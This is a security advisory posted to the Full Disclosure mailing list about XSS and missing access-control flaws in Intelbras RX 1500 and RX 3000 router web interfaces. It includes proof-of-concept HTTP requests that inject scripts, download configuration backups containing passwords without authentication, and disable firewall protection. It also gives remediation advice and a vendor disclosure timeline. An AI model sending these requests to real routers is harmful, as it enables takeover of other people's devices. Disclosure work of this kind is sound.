| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPYBWVwWKe3yQ2sQsxy3-JuHboEASpEEq2u3cqasUeg0cXaAfg@mail.gmail.com> Date: Mon, 14 Jul 2025 10:42:55 -0300 From: Gabriel Augusto Vaz de Lima via Fulldisclosure <fulldisclosure@...lists.org> To: fulldisclosure@...lists.org Subject: [FD] Multiple vulnerabilities in the web management interface of Intelbras routers =====[Tempest Security Intelligence]========================================== Multiple vulnerabilities in the web management interface of Intelbras routers Author: Gabriel Lima <gabriel lima () tempest com br > =====[Table of Contents]====================================================== 1. Overview 2. Detailed description 3. Other contexts & solutions 4. Acknowledgements 5. Timeline 6. References =====[1. Overview]============================================================ * Systems affected: Intelbras web interface RX 1500 - 2.2.9 (verified) (other routers/versions may be affected) Intelbras web interface RX 3000 - 1.0.11 (verified) (other routers/versions may be affected) * Release date: 07/14/2025 * Impact: Several vulnerabilities were found providing retrieval of administrative session tokens and direct unauthenticated access to sensitive features that allow the recovery of current router configuration. The new generation of connection comes via Wi-Fi 6 technology, delivering more speed, more network efficiency and less interference. Router RX 1500 [1] and RX 3000 [2] are ideal for residential plans with high-speed plans and high-performance connections. =====[2. Detailed description]================================================ The web management system for the RX 1500 and 3000 routers is designed to help the device’s administrator configure the device in the best way for their needs. However, upon carrying out a security research, multiple vulnerabilities related to XSS and direct unauthenticated access were spotted. As a result of performing this research, two types of vulnerabilities were found: Cross-Site Scripting (XSS) vulnerabilities and Direct Unauthenticated Access vulnerabilities. In regard to the XSS vulnerabilities, as a means to portray impact outcomes, an unauthenticated attacker may gain administrative access to the system and have full control of the router. On the other hand, an attacker with administrator access is able to create persistence to maintain access. Furthermore, in regard to the direct and unauthenticated access vulnerabilities, the application hosts endpoints that provide the retrieval of log files and the router's configuration file, which in turn, stores the device's password and its current settings. An important highlight regards the fact that any feature can be accessed in an unauthenticated manner, as long as an administrator is authenticated and active within the system. The following section dissects the XSS issues. 2.1 Possibility of injecting JavaScript code into client names (XSS) - CVE-2025-26064 An authenticated threat may inject persistent JavaScript from the connected clients configuration feature (Home > Connected clients). This problem occurs due to the lack of character handling in the “Name” field. As proof of concept, the following payload was used: <script>alert(1)</script> Payload used in plain text: <script>alert(1)</script> The following request pinpoints the insertion of the payload: [snippet] POST /HNAP1/ HTTP/1.1 Host: 10.0.0.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo" X-Requested-With: XMLHttpRequest Content-Length: 596 Cookie: uid=COOKIE-HERE <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" http://www.w3.org/2001/XMLSchema" xmlns:soap=" http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetClientInfo xmlns=" http://purenetworks.com/HNAP1/ "><ClientInfoLists><ClientInfo><MacAddress>Client-MacAddresss</MacAddress><NickName>PAYLOAD-IN-HTML-ENCODE</NickName><ReserveIP></ReserveIP><secRouter></secRouter><Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo></ClientInfoLists><COMMAND></COMMAND></SetClientInfo></soap:Body></soap:Envelope> [/snippet] Upon submitting this request, please note the outcome rendered within the context of the victim's browser. 2.2 Possibility of injecting JavaScript code into the name of the visiting network (XSS) - CVE-2025-26064 An authenticated threat may inject persistent JavaScript from the Guest Network functionality (in the Settings > Wi-Fi > Guest Network menu). This problem occurs due to the lack of character handling in the “Wi-Fi network name” field (both in 2.4GHz and 5GHz). As a proof of concept, the following payloads were HTML encoded and inserted into each field: 2.4GHz network: <script>alert(1)</script> 5GHz network: <script>alert(2)</script> Payloads used in plain text: 2.4GHz network: <script>alert(1)</script> 5GHz network: <script>alert(2)</script> The following portrays an example of the request submitted by the attacker: [snippet] POST /HNAP1/ HTTP/1.1 Host: 10.0.0.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions" X-Requested-With: XMLHttpRequest Content-Length: 2991 Cookie: uid=COOKIE-HERE <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" http://www.w3.org/2001/XMLSchema" xmlns:soap=" http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns=" http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings xmlns="http://purenetworks.com/HNAP1/ "><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope> [/snippet] By accessing the system's home page (namely: the Status page), one can observe the JavaScript rendering for both fields. 2.3 Possibility of multiple JavaScript code injections in the Site Survey feature (XSS) - CVE-2025-26063 The “Site Survey” feature (Management > Site Survey) has the purpose of displaying nearby active WIFI networks, and presenting their ESSIDs among other details. However, due to the lack of character handling, whenever an attacker creates a fake WIFI network containing HTML/JavaScript code (e.g. “<script>alert(1)</script>”), and the router administrator uses this feature, the malicious code will be executed at the moment the tab listing all available ESSIDs is opened. As a proof of concept, an SSID with the following name was created: <script>alert(1)</script> The following portrays an example of the request made by the administrator upon starting “Site Survey” scan: [snippet] POST /HNAP1/ HTTP/1.1 Host: [redacted] SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start" X-Requested-With: XMLHttpRequest Content-Length: 357 Cookie: [redacted] <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" http://www.w3.org/2001/XMLSchema" xmlns:soap=" http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><igd_wifi_list_scan_start xmlns="http://purenetworks.com/HNAP1/ "><radio>2.4g</radio></igd_wifi_list_scan_start></soap:Body></soap:Envelope> [/snippet] The XSS is executed by hovering the mouse pointer over the network's name (highlighted in the graphic presented within the router’s/device’s web management interface) or by opening the nearby devices section. The following section dissects the direct unauthenticated access issues. 2.4 Incorrect Access Control - CVE-2025-26062 This session will address 3 access control breach vulnerabilities, considered by mitre to be duplicates. For better understanding, they will be considered only as one topic. 2.4.1 Possibility of retrieving router logs The given router's administrative interface provides a feature (Management > System log) that allows an authenticated entity (e.g: an administrator) to retrieve the router's log file, which may contain potentially sensitive debug information. However, due to the lack of permissions validation, an unauthenticated entity can download the file without performing the authentication procedure. The following is an example request used as proof of concept: [snippet] POST /cgi-bin/dllog.cgi HTTP/1.1 Host: 10.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 13 Export=Export [/snippet] As a result, a log file containing potentially sensitive information is provided for download. 2.4.2 Possibility of recovering backups of router settings The given router's administrative interface provides a feature (Management > System) that allows an authenticated entity (e.g: an administrator) to retrieve the router's current configuration file, which may contain potentially sensitive information pertaining to the environment. However, due to the lack of permissions validation, an unauthenticated entity can download the file without performing the authentication procedure. To exploit the aforementioned concept, the following snippet illustrates the request made at the affected point by an unauthenticated attacker retrieving the router's configuration file, as well as showing part of the contents of the ".cfg" file in the request response: [snippet] POST /cgi-bin/ExportSettings.sh HTTP/1.1 Host: 10.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 13 Export=Export [/snippet] As a result of submitting the previously shown request, the retrieval of the .cfg backup file is done without the need for providing proper authorization. 2.4.3 Possibility of accessing various functionalities in an unauthenticated manner Various router features, such as editing firewall rules, configuring Wi-Fi specifications, and changing router security rules and policies, were found to be accessible in an unauthenticated manner if an administrator synchronically accessed the router's administrative interface at the moment of exploitation. In other words, the only caveat necessary to exploit this unauthenticated access is having an administrator logged in at the moment of exploitation. The following snippet represents a request to render the router's administrative interface publicly accessible (e.g.: accessible from the Internet): [snippet] POST /HNAP1/ HTTP/1.1 Host: 10.0.0.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings" X-Requested-With: XMLHttpRequest Content-Length: 491 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" http://www.w3.org/2001/XMLSchema" xmlns:soap=" http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetAdministrationSettings xmlns="http://purenetworks.com/HNAP1/ "><HTTPS>false</HTTPS><RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort><RemoteMgtHTTPS>false</RemoteMgtHTTPS><InboundFilter></InboundFilter></SetAdministrationSettings></soap:Body></soap:Envelope> [/snippet] The following snippet portrays a request with the purpose of disabling the router's Denial of Service (DoS) protection: [snippet] POST /HNAP1/ HTTP/1.1 Host: 10.0.0.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings" X-Requested-With: XMLHttpRequest Content-Length: 381 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" http://www.w3.org/2001/XMLSchema" xmlns:soap=" http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetFirewallEnableSettings xmlns="http://purenetworks.com/HNAP1/ "><Firewall_Enabled>false</Firewall_Enabled></SetFirewallEnableSettings></soap:Body></soap:Envelope> [/snippet] Other features are accessible in an unauthenticated manner, as long as the request is sent when the administrator is active. According to the arguments disclosed in this section, various attack vectors for administrative access originating from the perspective of an unauthenticated user becomes feasible. Furthermore, once authenticated as an administrator, an attacker would be able to generate persistence with the same approaches. =====[3. Other contexts & solutions]========================================== In regard to the XSS disclosed issues, it is recommended that all information coming from third parties (databases, other applications, client-side, etc.) have their special characters converted to the **HTML Entities** character set. Moreover, the data must be semantically filtered to guarantee that it conforms to the expected format and is free of any undesired characters. In regard to the unauthenticated access disclosed issues, it is strongly recommended that changes be made to the application's existing session management and access control, such that access to sensitive functionalities is available only to authenticated users, and that these users perform only actions permitted by their authorization profile. Moreover, it is important to highlight that all logic that determines whether a user has the necessary permissions to perform a certain action must execute **exclusively on the server-side**. =====[4. Acknowledgements]==================================================== - Joaquim Brasil de Oliveira < joaquim brasil () tempest com br > - Tempest Security Intelligence[3] =====[5. Timeline]============================================================ 07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability in the Site Survey functionality; 07/16/2024 - The vendor requested contact information; 07/17/2024 - Contact information has been sent to the supplier; 07/17/2024 - The vendor has begun the process of validating and acknowledging the first bug reported; 07/22/2024 - A full report has been sent with all the other discovered vulnerabilities; 07/25/2024 - The vendor acknowledged all the vulnerabilities reported in the RX 1500 and RX 3000 devices; 09/19/2024 - The vendor has released the beta version of the corrected firmware 2.2.12 09/23/2024 - All points have been retested and fixed; 01/27/2025 - Request CVE IDs from MITRE; 02/24/2025 - MITRE sent the CVEs IDs; 07/14/2025 - Publication date. =====[6. References]========================================================== [1] <http://www.asus.com/Networking/RTAC68U/> https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500 [2] http://intelbras.com/pt-br/roteador-wireless-rx-3000 [3] https://tempest.com.br -- *Esta mensagem é para uso exclusivo de seu destinatário e pode conter informações privilegiadas e confidenciais. Todas as informações aqui contidas devem ser tratadas como confidenciais e não devem ser divulgadas a terceiros sem o prévio consentimento por escrito da Tempest. Se você não é o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste caso, por favor, notifique o remetente da mesma e destrua imediatamente a mensagem.* * * *This message is intended solely for the use of its addressee and may contain privileged or confidential information. All information contained herein shall be treated as confidential and shall not be disclosed to any third party without Tempest’s prior written approval. If you are not the addressee you should not distribute, copy or file this message. In this case, please notify the sender and destroy its contents immediately.** * * * _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists